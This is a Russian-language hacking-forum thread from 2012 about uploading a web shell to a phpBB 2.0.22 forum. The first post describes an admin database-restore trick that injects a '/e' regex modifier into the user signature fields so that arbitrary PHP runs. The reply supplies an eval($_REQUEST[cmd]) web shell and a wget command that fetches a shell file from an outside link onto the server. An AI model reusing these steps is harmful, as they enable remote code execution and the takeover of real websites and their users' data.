HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу phpBB 2.0.22 залить шелл
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.10.2012, 16:43
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:

Код:
Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
phpinfo() выдает, но при вставке другого кода отказывается восстанавливать базу, либо не открывает страницу профиля

Пробовал вставлять и system($_GET[cmd]); при восстановлении ругается:

Код:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
 
Ответить с цитированием

  #2  
Старый 07.10.2012, 16:50
Ma:DFish
Новичок
Регистрация: 13.06.2009
Сообщений: 21
Провел на форуме:
378370

Репутация: 5
По умолчанию
Цитата:
Сообщение от ~nero~  
Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:
Код:
Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
phpinfo() выдает, но при вставке другого кода отказывается восстанавливать базу, либо не открывает страницу профиля
Пробовал вставлять и system($_GET[cmd]); при восстановлении ругается:
Код:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR
имяфайла.php?cmd=phpкод

например

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo `[/COLOR][COLOR="#DD0000"]wget cылка с шелом -O имяшела.php[/COLOR][COLOR="#007700"]`;[/COLOR][/COLOR
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.